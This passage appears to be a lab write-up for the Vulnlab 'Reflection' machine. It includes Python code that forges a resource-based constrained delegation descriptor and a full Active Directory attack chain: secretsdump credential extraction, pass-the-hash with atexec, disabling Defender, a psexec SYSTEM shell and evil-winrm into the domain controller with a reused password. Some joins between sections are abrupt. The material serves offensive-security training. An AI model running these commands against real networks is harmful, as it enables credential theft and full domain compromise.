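"""msDS-AllowedToActOnBehalfOfOtherIdentity: build and decode the value behind impacket-rbcd.

Added example for this writeup (not from the original post, not Impacket's code).
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
FULL_CONTROL = 0xF01FF            # 983551, the mask impacket-rbcd uses
BUILTIN_ADMINS = "S-1-5-32-544"   # owner/group impacket-rbcd puts in the descriptor
MS01_SID = "S-1-5-21-3375389138-1770791787-1490854311-1104"   # from the rbcd output above


def sid_to_bytes(sid: str) -> bytes:
    """S-1-<authority>-<sub>...  ->  Revision, SubAuthorityCount, 6-byte BE authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID: {sid}")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def sid_from_bytes(data: bytes, pos: int = 0):
    """Returns (sid_string, bytes_consumed)."""
    rev, count = data[pos], data[pos + 1]
    authority = int.from_bytes(data[pos + 2:pos + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, pos + 8)
    return "-".join(["S", str(rev), str(authority)] + [str(s) for s in subs]), 8 + 4 * count


def build_rbcd_sd(delegate_from_sids) -> bytes:
    """The value impacket-rbcd -action write stores: one allow-ACE per delegating principal."""
    aces = b""
    for sid in delegate_from_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: AceType, AceFlags, AceSize; then Mask and the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(delegate_from_sids), 0) + aces
    owner = group = sid_to_bytes(BUILTIN_ADMINS)
    off_owner, off_group = 20, 20 + len(owner)
    off_dacl = off_group + len(group)
    # SECURITY_DESCRIPTOR header: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + group + dacl


def read_rbcd_sd(sd: bytes):
    """What impacket-rbcd -action read reports: [(sid, access_mask)] for every allow-ACE in the DACL."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", sd, pos + 4)[0]
            allowed.append((sid_from_bytes(sd, pos + 8)[0], mask))
        pos += ace_size
    return allowed


if __name__ == "__main__":
    sd = build_rbcd_sd([MS01_SID])
    print(len(sd), "bytes:", sd.hex())
    print(read_rbcd_sd(sd))
    # Assumed usage with ldap3 against the WS01$ object (not run here):
    #   conn.modify(ws01_dn, {"msDS-AllowedToActOnBehalfOfOtherIdentity": [(MODIFY_REPLACE, [sd])]})
```

On the defensive side the same decoder applies to a Directory Service Changes event (5136) on this attribute: the SID in the ACE tells you which account was just granted S4U2Proxy against the computer, which is the fact worth alerting on.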
and a secretsdump against ws01.reflection.vl with that ticket (-k -no-pass). Besides WS01's local SAM, the LSA secrets contain a DefaultPassword entry, i.e. an autologon credential for Rhys.Garner:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword
reflection.vl\Rhys.Garner:kn<redacted>uP
[*] DPAPI_SYSTEM
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
The dump also gives WS01's local Administrator NT hash, so the Kerberos ticket is no longer needed: pass-the-hash with atexec runs commands as SYSTEM.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system
Disable Defender's real-time monitoring the same way, so that the psexec service binary is not removed:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
Then psexec for an interactive SYSTEM shell; the user flag is on Rhys.Garner's desktop:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> --

c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}
Rhys.Garner's autologon password is reused by the dom_rgarner account, which is a member of Domain Admins, so WinRM to DC01 with it gives the final flag:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir

    Directory: C:\Users\administrator\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt

*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop>
That’s all.